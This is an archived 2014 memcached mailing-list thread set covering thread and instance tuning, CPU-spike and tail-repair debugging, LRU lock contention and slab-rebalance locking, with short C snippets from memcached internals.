On Mon, Aug 4, 2014 at 9:36 PM, dormando dorma...@rydia.net wrote:
      You could run one instance with one thread and serve all of 
 that just
      fine. have you actually looked at graphs of the CPU usage of 
 the host?
      memcached should be practically idle with load that low.
   
      One with -t 6 or -t 8 would do it just fine.
   
      On Mon, 4 Aug 2014, Claudio Santana wrote:
   
       Dormando, thanks for the quick response. Sorry for the 
 confusion, I don't have exact metrics per second
   but
      per minute 1.12
        million sets and 1.8 million gets which translates to 18,666 
 sets per second and 30,000 gets per second.
      
       These stats are per Memcached instance which I currently run 
 3 on each server.
      
       Claudio.
      
      
       On Mon, Aug 4, 2014 at 6:22 PM, dormando dorma...@rydia.net 
 wrote:
             On Mon, 4 Aug 2014, Claudio Santana wrote:
      
              I have this Memcached cluster where 3 instances of 
 Memcached run in a single server. These servers
      have 24 cores,
             each instance
               is configured to have 8 threads each. Each individual 
 instance serves & have about 5000G gets/sets
   a
      day and about
             3k current
              connections.
      
       I don't know what 5000G gets/sets a day translates to in 
 per-second (nor
       what the G-unit even is?), can you define this?
      
        What would be better? consolidate these 3 instances to a 
 single instance per server with 24 threads?
   I've
      read in a few
       articles
        that Memcached's performance starts suffering with more 
 than 4-6 threads per instance, is this generally
      true?
       
        How about keeping the 3 instances per server and decreasing 
 the number of threads to say 4 or 6? or
      creating 4 instances
       in the
        same servers instead of 3 and decreasing the number of 
 threads per instance to 6 so there is one thread
      per core.
       
        Is there a guide you could recommend to configure the right 
 number of threads and strategies to get the
      most out of a
       Memcached
        server

Re: Memcached instance and thread configuration parameters

2014-08-07 Thread dormando
None of those commands should take up much time. If all other commands hang,
it's either a long-running stats command like the ones I listed before, or a
hang bug (though I don't know why it would recover on its own). We've fixed a
lot of those since .13, so I'd still advocate upgrading at least some
instances to see if they become immune to it.

On Thu, 7 Aug 2014, Claudio Santana wrote:


 I think this issue has something to do with our access pattern (although we 
 run very limited commands and not very high traffic either).

 We always start having issues on the same instance (I guess because the 
 system is accessing a specific key). When we notice the issue we bounce the 
 instance within 15-20 minutes; I don't know if you think this is not enough 
 time to recover.

 Sometimes the issue moves to other instances on other servers (our client 
 doesn't rebalance, so the system is trying to access completely different 
 keys). On the other servers the issue sometimes goes away on its own, or 
 the spike is not at 100%.

 On Aug 7, 2014 6:36 PM, dormando dorma...@rydia.net wrote:
   Those three stats commands aren't problematic. The others I listed are.
   Sadly there aren't stats counters for them, I think... Are you sure it's
   not completely crashing after the CPU spike? it actually recovers on its
   own?

   On Thu, 7 Aug 2014, Claudio Santana wrote:

   
I run every minute stats, stats items and stats slabs.
   
the only commands executed are remove, incr, add, get, set and cas.
   
I'm running now with 6 threads per instance with 3 per server and 
 haven't had the issue again,  not that this
   change fixed it.
   
I'll definitely update.
   
On Aug 7, 2014 6:13 PM, dormando dorma...@rydia.net wrote:
      Please upgrade. If you have problems with the latest version we 
 can look
      into it more.
   
      You can also look at command counters for odd commands being 
 given: make
      sure nobody's running flushes, or stats sizes, or stats 
 cachedump
      since those can cause CPU spikes and hangs.
   
      With 1.4.20 you can use stats conns to see what the 
 connections are
      doing during the cpu spike.
   
      On Thu, 7 Aug 2014, Claudio Santana wrote:
   
        Forgot to say I'm running version 1.4.13 & libevent 
 2.0.16-stable
      
      
      
       On Thu, Aug 7, 2014 at 6:08 PM, Claudio Santana 
 claudio.sant...@gmail.com wrote:
             Sorry for the late response.
      
       My CPU utilization normally is min 2.5% to 6.5% max.
      
        So it's interesting you ask this. The reason I submitted the first 
 question is that I've experienced some random CPU utilization spikes. From 
 about 6% CPU utilization it suddenly spikes to 100%, and I can see the 
 offending process is one of the Memcached instances. Sadly this CPU spike 
 is accompanied by all requests timing out, causing the whole system to 
 become unusable.
      
       I collect minute by minute stats of all these memcached 
 instances and according to my stats this issue
   happens
      within 2
       minutes. I can see in the number of commands there's no 
 increase in number of commands being issued right
   before
      the CPU
       spike nor increase in the number of bytes in/out.
      
       Does anybody have any ideas of what could be going on?
      
       I have all Memcached stats collected by minute in Graphite, I 
 can provide other stats that could help
   explain this
      issue
       if necessary.
      
      
       On Mon, Aug 4, 2014 at 9:36 PM, dormando dorma...@rydia.net 
 wrote:
             You could run one instance with one thread and serve 
 all of that just
             fine. have you actually looked at graphs of the CPU 
 usage of the host?
             memcached should be practically idle with load that low.
      
             One with -t 6 or -t 8 would do it just fine.
      
             On Mon, 4 Aug 2014, Claudio Santana wrote:
      
              Dormando, thanks for the quick response. Sorry for 
 the confusion, I don't have exact metrics per
   second
      but
             per minute 1.12
               million sets and 1.8 million gets which translates to 
 18,666 sets per second and 30,000 gets per
   second.
             
              These stats are per Memcached instance which I 
 currently run 3 on each server.
             
              Claudio

Re: Export Control Classification Number (ECCN) of memcached 1.4

2014-08-06 Thread dormando
I have no idea what you're talking about.

On Wed, 6 Aug 2014, skt8u...@gmail.com wrote:

 Dear All,

 I'm developing a system using memcached 1.4
 and I'll release it to the other country (Italy).

 Could you please give me, the US Export Control Classification Number (ECCN) 
 of memcached 1.4 ?

 I understand that there is basically no ECCN for open-source software.

 Could you please confirm that ?

 Thanks for your answer.

 Best regards,
 Tommy



Re: Memcached instance and thread configuration parameters

2014-08-04 Thread dormando
On Mon, 4 Aug 2014, Claudio Santana wrote:

 I have this Memcached cluster where 3 instances of Memcached run in a single 
 server. These servers have 24 cores, each instance
 is configured to have 8 threads each. Each individual instance serves & have 
 about 5000G gets/sets a day and about 3k current
 connections.

I don't know what 5000G gets/sets a day translates to in per-second (nor
what the G-unit even is?), can you define this?

 What would be better? consolidate these 3 instances to a single instance per 
 server with 24 threads? I've read in a few articles
 that Memcached's performance starts suffering with more than 4-6 threads per 
 instance, is this generally true?

 How about keeping the 3 instances per server and decreasing the number of 
 threads to say 4 or 6? or creating 4 instances in the
 same servers instead of 3 and decreasing the number of threads per instance 
 to 6 so there is one thread per core.

 Is there a guide you could recommend to configure the right number of threads 
 and strategies to get the most out of a Memcached
 server/instance?

 Thanks,
 Claudio



Re: Memcached instance and thread configuration parameters

2014-08-04 Thread dormando
You could run one instance with one thread and serve all of that just
fine. have you actually looked at graphs of the CPU usage of the host?
memcached should be practically idle with load that low.

One with -t 6 or -t 8 would do it just fine.

On Mon, 4 Aug 2014, Claudio Santana wrote:

 Dormando, thanks for the quick response. Sorry for the confusion, I don't 
 have exact metrics per second, but per minute it's 1.12 million sets and 
 1.8 million gets, which translates to 18,666 sets per second and 30,000 
 gets per second.

 These stats are per Memcached instance which I currently run 3 on each server.

 Claudio.


 On Mon, Aug 4, 2014 at 6:22 PM, dormando dorma...@rydia.net wrote:
   On Mon, 4 Aug 2014, Claudio Santana wrote:

I have this Memcached cluster where 3 instances of Memcached run in a 
 single server. These servers have 24 cores,
   each instance
is configured to have 8 threads each. Each individual instance serves 
 & have about 5000G gets/sets a day and about
   3k current
connections.

 I don't know what 5000G gets/sets a day translates to in per-second (nor
 what the G-unit even is?), can you define this?

  What would be better? consolidate these 3 instances to a single instance 
  per server with 24 threads? I've read in a few
 articles
  that Memcached's performance starts suffering with more than 4-6 threads 
  per instance, is this generally true?
 
  How about keeping the 3 instances per server and decreasing the number of 
  threads to say 4 or 6? or creating 4 instances
 in the
  same servers instead of 3 and decreasing the number of threads per instance 
  to 6 so there is one thread per core.
 
  Is there a guide you could recommend to configure the right number of 
  threads and strategies to get the most out of a
 Memcached
  server/instance?
 
  Thanks,
  Claudio
 
 



Re: LRU lock per slab class

2014-08-03 Thread dormando
 Hello Dormando,
 Thanks for the answer.

 The LRU fiddling only happens once a minute per item, so hot items don't 
 affect the lock as much. The more you lean toward hot
 items the better it scales as-is.
 => For linked-list traversal, threads acquire an item-partitioned lock, but 
 they acquire a global lock for the LRU update. 
 So all the GET commands that find the requested item in the hash table try 
 to acquire the same lock; I think the total hit rate is a bigger factor in 
 the lock contention than how often each item is touched for the LRU update. 
 Did I miss something?

The GET command only acquires the LRU lock if it's been more than a minute
since the last time it was retrieved. That's all there is to it.
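
A minimal sketch of that rate-limit check; ITEM_UPDATE_INTERVAL really is 60
seconds in items.c, but the surrounding code here is simplified and
illustrative, not the exact source:

#include <stdbool.h>
#include <time.h>

#define ITEM_UPDATE_INTERVAL 60  /* seconds, as in items.c */

typedef struct item {
    time_t time;  /* last time this item was bumped in the LRU */
} item;

/* The LRU bump on a GET (and hence the global lock) only happens when
 * the item hasn't already been bumped within the last minute. */
static bool needs_lru_bump(const item *it, time_t current_time) {
    return it->time < current_time - ITEM_UPDATE_INTERVAL;
}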

 I don't think anything stops it. Rebalance tends to stay within one class. It 
 was on my list of scalability fixes to work on,
 but I postponed it for a few reasons.
 One is that most tend to have over half of their requests in one slab class. 
 So splitting the lock doesn't give as much of a
 long term benefit.
 So, I wanted to come back to it later and see what other options were 
 plausible for scaling the lru within a single slab class.
 Nobody's complained about the performance after the last round of work as 
 well, so it stays low priority.
 Are your objects always only hit once per minute? What kind of performance 
 are you seeing and what do you need to get out of it?
 => Thanks for your comments. I was trying to find the proper network 
 speed (1Gb, 10Gb) for current memcached operation. 
 I saw the best performance at around 4-6 threads (1.1M rps) with the help 
 of multi-get.

With the LRU out of the way it does go up to 12-16 threads. Also if you
use numactl to pin it to one node it seems to do better... but most people
just don't hit it that hard, so it doesn't matter?
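
(numactl does the pinning from the shell; the rough programmatic equivalent
via libnuma is sketched below. This assumes libnuma is installed and is
purely illustrative; memcached does not do this itself:)

#include <numa.h>   /* link with -lnuma */
#include <stdio.h>

int main(void) {
    if (numa_available() < 0) {
        fprintf(stderr, "no NUMA support on this system\n");
        return 1;
    }
    /* Run on node 0 and prefer allocating memory there, roughly what
     * `numactl --cpunodebind=0 --preferred=0` arranges. */
    numa_run_on_node(0);
    numa_set_preferred(0);
    return 0;
}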


 On Saturday, August 2, 2014 at 8:19:59 AM UTC+9, Dormando wrote:


 On Jul 31, 2014, at 10:01 AM, Byung-chul Hong byungch...@gmail.com wrote:

   Hello,
 I'm testing the scalability of the memcached-1.4.20 version in a 
 GET-dominated system.
 For linked-list traversal in the hash table (do_item_get), it is protected 
 by an interleaved lock (per bucket), so it showed very high scalability. 
 But after the linked-list traversal, the LRU update is protected by a 
 global lock (cache_lock), so scalability was limited to around 4-6 threads 
 by the global lock of the LRU update, on a Xeon server system
 (10Gb Ethernet).


 The LRU fiddling only happens once a minute per item, so hot items don't 
 affect the lock as much. The more you lean toward
 hot items the better it scales as-is. 



 As I understand it, the LRU is maintained per slab class, so an LRU update 
 modifies only the items contained in the same class.
 So I think the global lock for LRU updates could be changed to an 
 interleaved lock per slab class.
 With concurrent SET commands, store and removal of items in the same class 
 can happen concurrently, 
 but the SET operation could also be changed to take the slab-class lock 
 before adding/removing new items to/from the slab class. 

 In the case of store/removal of a linked item in the hash table (which may 
 reside in a different slab class), 
 it only updates the h_next value of the current item, and it does not touch 
 the LRU pointers (next, prev). 
 So I think it would be safe to change to an interleaved lock.

 Are there any other reasons, which I missed, that the LRU update requires a 
 global lock?
 (I'm not using slab rebalance, I give a large enough initial hash power 
 value, and clients only use GET and SET commands)


 I don't think anything stops it. Rebalance tends to stay within one class. It 
 was on my list of scalability fixes to work
 on, but I postponed it for a few reasons.

 One is that most tend to have over half of their requests in one slab class. 
 So splitting the lock doesn't give as much of
 a long term benefit.

 So, I wanted to come back to it later and see what other options were 
 plausible for scaling the lru within a single slab
 class. Nobody's complained about the performance after the last round of work 
 as well, so it stays low priority.

 Are your objects always only hit once per minute? What kind of performance 
 are you seeing and what do you need to get out
 of it?

 Any comments would be highly appreciated!


Re: LRU lock per slab class

2014-08-01 Thread Dormando


 On Jul 31, 2014, at 10:01 AM, Byung-chul Hong byungchul.h...@gmail.com 
 wrote:
 
 Hello,
 
 I'm testing the scalability of the memcached-1.4.20 version in a 
 GET-dominated system.
 For linked-list traversal in the hash table (do_item_get), it is protected 
 by an interleaved lock (per bucket), so it showed very high scalability. 
 But after the linked-list traversal, the LRU update is protected by a 
 global lock (cache_lock), so scalability was limited to around 4-6 threads 
 by the global lock of the LRU update, on a Xeon server system (10Gb 
 Ethernet).

The LRU fiddling only happens once a minute per item, so hot items don't affect 
the lock as much. The more you lean toward hot items the better it scales as-is.

 
 As I understand it, the LRU is maintained per slab class, so an LRU update 
 modifies only the items contained in the same class.
 So I think the global lock for LRU updates could be changed to an 
 interleaved lock per slab class.
 With concurrent SET commands, store and removal of items in the same class 
 can happen concurrently, 
 but the SET operation could also be changed to take the slab-class lock 
 before adding/removing new items to/from the slab class. 
 
 In the case of store/removal of a linked item in the hash table (which may 
 reside in a different slab class), 
 it only updates the h_next value of the current item, and it does not touch 
 the LRU pointers (next, prev). 
 So I think it would be safe to change to an interleaved lock.
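
 (For readers: the separation relied on here is that hash chaining and LRU
 linkage use different pointer fields on the item. A simplified sketch of
 the item header, modeled on memcached.h with most fields omitted:)

 typedef struct _stritem {
     struct _stritem *next;    /* LRU list: toward the tail */
     struct _stritem *prev;    /* LRU list: toward the head */
     struct _stritem *h_next;  /* hash chain within a bucket */
     /* ... timestamps, refcount, flags and the data follow ... */
 } item;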
 
 Are there any other reasons, which I missed, that the LRU update requires a 
 global lock?
 (I'm not using slab rebalance, I give a large enough initial hash power 
 value, and clients only use GET and SET commands)

I don't think anything stops it. Rebalance tends to stay within one class. It 
was on my list of scalability fixes to work on, but I postponed it for a few 
reasons.

One is that most tend to have over half of their requests in one slab class. So 
splitting the lock doesn't give as much of a long term benefit.

So, I wanted to come back to it later and see what other options were plausible 
for scaling the lru within a single slab class. Nobody's complained about the 
performance after the last round of work as well, so it stays low priority.

Are your objects always only hit once per minute? What kind of performance are 
you seeing and what do you need to get out of it?
 
 Any comments would be highly appreciated!
 


Re: tail repair issue (1.4.20)

2014-07-07 Thread dormando


 Dormando, sure. I waited till Monday (our usual tailrepair/oom errors day) 
 but we did not have any issues today :). I will continue to monitor and
 will grab stats conns next time.

Great, thanks!

 As for network issues around the last incident: I do not see any, but I'm 
 still trying to find them. That would be a good explanation for why such 
 events are grouped in time.

 As for keepalive: we use the default php-memcached/libmemcached setting (we 
 do not change it), and as far as I can see libmemcached does not set 
 SO_KEEPALIVE. Do you recommend setting it?

Let's see what stats conns says first. I guess it's theoretically possible
that an item was leaked, but was actually fetched (and expired properly)
at some point, fixing the issue. It would've still leaked the item though.

So if 'stats conns' doesn't show some hung clients, we might still have a
reference leak somewhere. Which would be sad, since Steven Grimm fixed a
number of them just recently...

 On Wednesday, July 2, 2014 7:32:14 PM UTC-7, Dormando wrote:
   Thanks!

   This is a little exciting actually, it's a new bug!

   tailrepairs was only necessary when an item was legitimately leaked; if 
 we
   don't reap it, it never gets better. However you stated that for three
   hours all sets fail (and at the same time some .15's crashed). Then it
   self-recovered.

   The .15 crashes were likely from the bug I fixed; where an active item 
 is
   fetched from the tail, but then reclaimed because it's old.

   The .20 OOM is the defensive code working perfectly; something has
   somehow retained a legitimate reference to an item for multiple hours!
   More than one even, since the tail is walked up by several items while
   looking for something to free.

   Did you have any network blips, application server crashes, or the like?
   It sounds like some connections are dying in such a way that they time
   out, which is a very long timeout somehow (no tcp keepalives?).

   What's *extra* exciting is that 1.4.20 now has the stats conns 
 command.

   If this happens again, while a .20 machine is actively OOM'ing, can you
   grab a couple copies of the stats conns output, a few minutes apart?
   That should definitively tell us if there are stuck connections causing
   this issue.

   Someone had a PR open for adding idle connection timeouts, but I asked
   them to redo it on top of the 'stats conns' work as a more efficient
   background thread. I could potentially finish this and it would be 
 usable
   as a workaround. You could also enable tcp keepalives, or otherwise fix
   whatever's causing these events.

   I wonder if it's also worth attempting to relink an item that ends up in
   the tail but has references? That would at least potentially get them 
 out
   of the way of memory reclamation.

   Thanks!

   On Wed, 2 Jul 2014, Denis Samoylov wrote:

1)  OOM's on slab 13, but it recovered on its own? This is under 
 version 1.4.20 and you did *not* enable tail repairs? correct
   
2) Can you share (with me at least) the full stats/stats items/stats 
 slabs output from one of the affected servers running 1.4.20? 
Sent you the _current_ stats from the server that had the OOM a couple of 
 days ago and is still running (now with no issues).
   
3) Can you confirm that 1.4.20 isn't *crashing*, but is actually 
 exhibiting write failures? 
correct
   
We will enable saving stderr to a log; maybe this can show something. 
 If you have any other ideas, let me know.
   
-denis
   
   
   
On Wednesday, July 2, 2014 1:36:57 PM UTC-7, Dormando wrote:
      Cool. That is disappointing.
   
      Can you clarify a few things for me:
   
      1) You're saying that you were getting OOM's on slab 13, but it 
 recovered
      on its own? This is under version 1.4.20 and you did *not* 
 enable tail
      repairs?
   
      2) Can you share (with me at least) the full stats/stats 
 items/stats slabs
      output from one of the affected servers running 1.4.20?
   
      3) Can you confirm that 1.4.20 isn't *crashing*, but is actually
      exhibiting write failures?
   
      If it's not a crash, and your hash power level isn't expanding, 
 I don't
      think it's related to the other bug.
   
      thanks!
   
      On Wed, 2 Jul 2014, Denis Samoylov wrote:
   
        Dormando, sure, we will add the option to preset the hashtable. (As 
 I see it, nn should be 26.)
        One question: as I see in the logs for the servers, there is no 
 change in hash_power_level before the incident (it would be hard to say 
 for the crashed ones, but .20 just had out-of-memory errors and I have 
 solid stats). Doesn't this contradict the idea of the cause? The server had

Re: slab re-balance seems not thread-safty

2014-07-03 Thread dormando
Seems like you're right... I'd rearranged where the LRU lock (cache_lock)
is taken and then forgot to update that one bit. Most of the do_item_unlink
code is safe there, until it gets into the LRU bits. It's unlikely anyone
actually saw a crash from this, as it's a narrow race, though.

That's easy to fix. It's still necessary to delete it, since threads can
stack around a handful of objects and cause rebalance to hang.
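
A minimal sketch of what guarding that unlink looks like, assuming a single
cache_lock protects the LRU list; illustrative only, not the actual patch:

#include <pthread.h>
#include <stddef.h>

typedef struct node { struct node *next, *prev; } node;

static pthread_mutex_t cache_lock = PTHREAD_MUTEX_INITIALIZER;
static node *head, *tail;

/* The unlink edits the neighbours' pointers, not just this node's, so
 * all of it has to happen under the lock protecting the list. */
static void lru_unlink(node *it) {
    pthread_mutex_lock(&cache_lock);
    if (it->prev) it->prev->next = it->next;
    if (it->next) it->next->prev = it->prev;
    if (head == it) head = it->next;
    if (tail == it) tail = it->prev;
    it->next = it->prev = NULL;
    pthread_mutex_unlock(&cache_lock);
}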

Thanks!

On Thu, 3 Jul 2014, Zhiwei Chan wrote:

  The item lock can only protect the hash list, but what about the LRU list? 
 As far as I know, when deleting a node from a doubly-linked list,
 it is necessary to lock at least 3 nodes: node, node->prev, node->next. I 
 will try to check in gdb next week whether it can crash the LRU list.
   And I think in do_item_get it is not necessary to delete the item that is 
 being rebalanced; just leaving it there and returning NULL seems better.

 On Thursday, July 3, 2014 at 1:30:29 PM UTC+8, Dormando wrote:
   the item lock is already held for that key when do_item_get is called,
   which is why the nolock code is called there.

   slab rebalance has that second short-circuiting of fetches to ensure 
 very
   hot items don't permanently jam a page move.

   On Wed, 2 Jul 2014, Zhiwei Chan wrote:

Hi all,   I have thought carefully about thread safety in memcached 
 recently, and found that if the rebalance is running, it may
   not be
thread-safe. The code path do_item_get->do_item_unlink_nolock may 
 corrupt the hash table. Whenever it tries to modify the hash table
   it should take
cache_lock, but the function do_item_get has not taken cache_lock.
   Please tell me if I neglected anything.
   
/** wrapper around assoc_find which does the lazy expiration logic */
item *do_item_get(const char *key, const size_t nkey, const uint32_t hv) {
    //mutex_lock(&cache_lock);
    item *it = assoc_find(key, nkey, hv);
    if (it != NULL) {
        refcount_incr(&it->refcount);
        /* Optimization for slab reassignment. prevents popular items from
         * jamming in busy wait. Can only do this here to satisfy lock order
         * of item_lock, cache_lock, slabs_lock. */
        if (slab_rebalance_signal &&
            ((void *)it >= slab_rebal.slab_start &&
             (void *)it < slab_rebal.slab_end)) {
            do_item_unlink_nolock(it, hv);    <--- no lock before unlink.
            do_item_remove(it);
            it = NULL;
        }
    }
   


Re: tail repair issue (1.4.20)

2014-07-02 Thread dormando
Cool. That is disappointing.

Can you clarify a few things for me:

1) You're saying that you were getting OOM's on slab 13, but it recovered
on its own? This is under version 1.4.20 and you did *not* enable tail
repairs?

2) Can you share (with me at least) the full stats/stats items/stats slabs
output from one of the affected servers running 1.4.20?

3) Can you confirm that 1.4.20 isn't *crashing*, but is actually
exhibiting write failures?

If it's not a crash, and your hash power level isn't expanding, I don't
think it's related to the other bug.

thanks!

On Wed, 2 Jul 2014, Denis Samoylov wrote:

 Dormando, sure, we will add the option to preset the hashtable. (As I see 
 it, nn should be 26.)
 One question: as I see in the logs for these servers, there is no change in 
 hash_power_level before the incident (it would be hard to say for the 
 crashed ones, but .20 just had out-of-memory errors and I have solid 
 stats). Doesn't this contradict the idea of the cause? The server had 
 hash_power_level = 26 for days before and still has 26 days after. Just 
 for three hours, every set for slab 13 failed. We did not reboot/flush the 
 server and it continues to work without problem. What do you think?

 On Tuesday, July 1, 2014 2:43:49 PM UTC-7, Dormando wrote:
   Hey,

   Can you presize the hash table? (-o hashpower=nn) to be large enough on
   those servers such that hash expansion won't happen at runtime? You can
   see what hashpower is on a long running server via stats to know what to
   set the value to.

   If that helps, we might still have a bug in hash expansion. I see 
 someone
   finally reproduced a possible issue there under .20. .17/.19 fix other
   causes of the problem pretty thoroughly though.

   On Tue, 1 Jul 2014, Denis Samoylov wrote:

Hi,
We had sporadic memory corruption due to tail repair in pre-.20 versions. 
 So we updated some of our servers to .20. This Monday we observed
   several
crashes in the .15 version and tons of allocation failures in the .20 
 version. This is expected, as .20 just disables tail repair, but it
   seems the
problem is still there. What is interesting:
1) there is no visible change in traffic, and usually only one slab is 
 affected. 
2) this always happens with several but not all servers :)
   
Is there any way to catch this and help with debugging? I have all slab 
 and item stats for the time around the incident for the .15 and .20
   versions. .15 is
clearly memory corruption: gdb shows that the hash function returned 0 
 (line 115: uint32_t hv = hash(ITEM_key(search), search->nkey, 0);).
   
so we seems hitting this comment:
            /* Old rare bug could cause a refcount leak. We haven't 
 seen
             * it in years, but we leave this code in to prevent 
 failures
             * just in case */
   
:)
   
Thank you,
Denis
   


Re: tail repair issue (1.4.20)

2014-07-02 Thread dormando
Thanks!

This is a little exciting actually, it's a new bug!

tailrepairs was only necessary when an item was legitimately leaked; if we
don't reap it, it never gets better. However you stated that for three
hours all sets fail (and at the same time some .15's crashed). Then it
self-recovered.

The .15 crashes were likely from the bug I fixed; where an active item is
fetched from the tail, but then reclaimed because it's old.

The .20 OOM is the defensive code working perfectly; something has
somehow retained a legitimate reference to an item for multiple hours!
More than one even, since the tail is walked up by several items while
looking for something to free.

Did you have any network blips, application server crashes, or the like?
It sounds like some connections are dying in such a way that they time
out, which is a very long timeout somehow (no tcp keepalives?).

What's *extra* exciting is that 1.4.20 now has the stats conns command.

If this happens again, while a .20 machine is actively OOM'ing, can you
grab a couple copies of the stats conns output, a few minutes apart?
That should definitively tell us if there are stuck connections causing
this issue.

Someone had a PR open for adding idle connection timeouts, but I asked
them to redo it on top of the 'stats conns' work as a more efficient
background thread. I could potentially finish this and it would be usable
as a workaround. You could also enable tcp keepalives, or otherwise fix
whatever's causing these events.
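
(Enabling keepalives on the client side is a one-line setsockopt; a minimal
sketch in standard POSIX C, not memcached or libmemcached code:)

#include <sys/socket.h>

/* Turn on TCP keepalives for a connected socket so dead peers are
 * eventually detected even when the connection is completely idle. */
static int enable_keepalive(int fd) {
    int one = 1;
    return setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &one, sizeof(one));
}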

I wonder if it's also worth attempting to relink an item that ends up in
the tail but has references? That would at least potentially get them out
of the way of memory reclamation.

Thanks!

On Wed, 2 Jul 2014, Denis Samoylov wrote:

 1)  OOM's on slab 13, but it recovered on its own? This is under version 
 1.4.20 and you did *not* enable tail repairs? correct

 2) Can you share (with me at least) the full stats/stats items/stats slabs 
 output from one of the affected servers running 1.4.20? 
 Sent you the _current_ stats from the server that had the OOM a couple of 
 days ago and is still running (now with no issues).

 3) Can you confirm that 1.4.20 isn't *crashing*, but is actually exhibiting 
 write failures? 
 correct

 We will enable saving stderr to a log; maybe this can show something. If 
 you have any other ideas, let me know.

 -denis



 On Wednesday, July 2, 2014 1:36:57 PM UTC-7, Dormando wrote:
   Cool. That is disappointing.

   Can you clarify a few things for me:

   1) You're saying that you were getting OOM's on slab 13, but it 
 recovered
   on its own? This is under version 1.4.20 and you did *not* enable tail
   repairs?

   2) Can you share (with me at least) the full stats/stats items/stats 
 slabs
   output from one of the affected servers running 1.4.20?

   3) Can you confirm that 1.4.20 isn't *crashing*, but is actually
   exhibiting write failures?

   If it's not a crash, and your hash power level isn't expanding, I don't
   think it's related to the other bug.

   thanks!

   On Wed, 2 Jul 2014, Denis Samoylov wrote:

Dormando, sure, we will add the option to preset the hashtable. (As I see 
 it, nn should be 26.)
One question: as I see in the logs for these servers, there is no change in 
 hash_power_level before the incident (it would be hard to say for
   the crashed ones, but .20
just had out-of-memory errors and I have solid stats). Doesn't this 
 contradict the idea of the cause? The server had hash_power_level = 26 for 
 days
   before and
still has 26 days after. Just for three hours, every set for slab 13 
 failed. We did not reboot/flush the server and it continues to work
   without
problem. What do you think?
   
On Tuesday, July 1, 2014 2:43:49 PM UTC-7, Dormando wrote:
      Hey,
   
      Can you presize the hash table? (-o hashpower=nn) to be large 
 enough on
      those servers such that hash expansion won't happen at runtime? 
 You can
      see what hashpower is on a long running server via stats to 
 know what to
      set the value to.
   
      If that helps, we might still have a bug in hash expansion. I 
 see someone
      finally reproduced a possible issue there under .20. .17/.19 
 fix other
      causes of the problem pretty thoroughly though.
   
      On Tue, 1 Jul 2014, Denis Samoylov wrote:
   
       Hi,
        We had sporadic memory corruption due to tail repair in pre-.20 
 versions. So we updated some of our servers to .20. This Monday we
   observed
      several
        crashes in the .15 version and tons of allocation failures in 
 the .20 version. This is expected, as .20 just disables tail repair,
   but it
      seems the
        problem is still there. What is interesting:
        1) there is no visible change in traffic, and usually only one 
 slab is affected. 
       2

Re: slab re-balance seems not thread-safty

2014-07-02 Thread dormando
the item lock is already held for that key when do_item_get is called,
which is why the nolock code is called there.

slab rebalance has that second short-circuiting of fetches to ensure very
hot items don't permanently jam a page move.

On Wed, 2 Jul 2014, Zhiwei Chan wrote:

 Hi all,   I have thought carefully about thread safety in memcached 
 recently, and found that if the rebalance is running, it may not be
 thread-safe. The code path do_item_get->do_item_unlink_nolock may corrupt 
 the hash table. Whenever it tries to modify the hash table, it should take
 cache_lock, but the function do_item_get has not taken cache_lock.
    Please tell me if I neglected anything.

 /** wrapper around assoc_find which does the lazy expiration logic */
 item *do_item_get(const char *key, const size_t nkey, const uint32_t hv) {
     //mutex_lock(&cache_lock);
     item *it = assoc_find(key, nkey, hv);
     if (it != NULL) {
         refcount_incr(&it->refcount);
         /* Optimization for slab reassignment. prevents popular items from
          * jamming in busy wait. Can only do this here to satisfy lock order
          * of item_lock, cache_lock, slabs_lock. */
         if (slab_rebalance_signal &&
             ((void *)it >= slab_rebal.slab_start &&
              (void *)it < slab_rebal.slab_end)) {
             do_item_unlink_nolock(it, hv);    <--- no lock before unlink.
             do_item_remove(it);
             it = NULL;
         }
     }



Re: tail repair issue (1.4.20)

2014-07-01 Thread dormando
Hey,

Can you presize the hash table? (-o hashpower=nn) to be large enough on
those servers such that hash expansion won't happen at runtime? You can
see what hashpower is on a long running server via stats to know what to
set the value to.
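
(For a sense of scale: hashpower is the log2 of the bucket count, so the
table holds 1 << hashpower pointers. A tiny illustrative calculation:)

#include <stdio.h>

int main(void) {
    unsigned int hashpower = 26;  /* e.g. the value reported by "stats" */
    unsigned long buckets = 1UL << hashpower;
    /* each bucket is one pointer; approximate table size in MB */
    printf("hashpower %u -> %lu buckets (~%lu MB of pointers)\n",
           hashpower, buckets,
           (unsigned long)((buckets * sizeof(void *)) >> 20));
    return 0;
}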

If that helps, we might still have a bug in hash expansion. I see someone
finally reproduced a possible issue there under .20. .17/.19 fix other
causes of the problem pretty thoroughly though.

On Tue, 1 Jul 2014, Denis Samoylov wrote:

 Hi,
 We had sporadic memory corruption due to tail repair in pre-.20 versions, 
 so we updated some of our servers to .20. This Monday we observed several
 crashes in the .15 version and tons of allocation failures in the .20 
 version. This is expected, as .20 just disables tail repair, but it seems 
 the problem is still there. What is interesting:
 1) there is no visible change in traffic, and usually only one slab is 
 affected. 
 2) this always happens with several but not all servers :)

 Is there any way to catch this and help with debugging? I have all slab and 
 item stats for the time around the incident for the .15 and .20 versions. 
 .15 is clearly memory corruption: gdb shows that the hash function 
 returned 0 (line 115: uint32_t hv = hash(ITEM_key(search), search->nkey, 0);).

 so we seems hitting this comment:
             /* Old rare bug could cause a refcount leak. We haven't seen
              * it in years, but we leave this code in to prevent failures
              * just in case */

 :)

 Thank you,
 Denis



Re: slabclass_t.slots

2014-06-05 Thread dormando
Yes this is fixed in .17. 1.4.20 is the recommended version.

The corruption isn't in this function, it's outside of it:

https://github.com/memcached/memcached/pull/67
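
(To answer the "where does slots get a value" part directly: the freelist
starts empty and is populated as items are freed or as a fresh slab page is
carved into chunks. A simplified, self-contained sketch of that push/pop
pattern; the names echo slabs.c of that era, but the code is illustrative,
not the exact source:)

#include <stddef.h>

typedef struct item_stub {
    struct item_stub *next;  /* freelist linkage reuses the item header */
} item_stub;

typedef struct {
    item_stub *slots;      /* freelist head; NULL until something is freed */
    unsigned int sl_curr;  /* number of free chunks on the list */
} slabclass_t;

/* Freeing an item (or carving a new slab page into chunks) pushes
 * onto slots... */
static void slots_push(slabclass_t *p, item_stub *it) {
    it->next = p->slots;
    p->slots = it;
    p->sl_curr++;
}

/* ...and allocation pops, which is only valid while sl_curr > 0; the
 * segfault in this thread dereferenced slots without that guard holding. */
static item_stub *slots_pop(slabclass_t *p) {
    if (p->sl_curr == 0)
        return NULL;
    item_stub *it = p->slots;
    p->slots = it->next;
    p->sl_curr--;
    return it;
}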

On Wed, 4 Jun 2014, Denis Samoylov wrote:

 hi,
 We got a segfault today (stack is below if interesting; we use 1.4.15, and 
 yes, I saw Dormando's comment about some fixes in .17, but I cannot trace 
